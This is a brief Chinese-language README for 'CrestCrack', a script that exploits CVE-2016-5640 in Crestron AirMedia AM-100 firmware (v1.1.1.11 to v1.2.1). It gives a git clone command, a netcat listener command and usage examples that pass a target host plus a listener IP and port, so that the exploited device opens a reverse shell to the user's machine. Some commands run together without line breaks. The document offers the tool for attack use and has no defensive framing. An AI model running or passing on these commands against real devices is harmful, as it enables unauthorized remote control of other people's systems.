CrestCrack 是一个简单的脚本,用于利用 Crestron AirMedia AM-100(v1.1.1.11 - v1.2.1)中的 CVE-2016-5640 / CLVA-2016-05-002。提供参数后,CrestCrack 将利用 netcat 在目标和您选择的 netcat 监听器之间创建反弹 shell。
git clone https://github.com/vpnguy/CrestCracknc -lvp 1337./crestcrack.py https://targethost 255.255.255.255 1337###用法: ./crescrack.py [target host] [listener IP] [listener port]
###示例: ./crescrack.py https://targethost 123.123.123.123 3311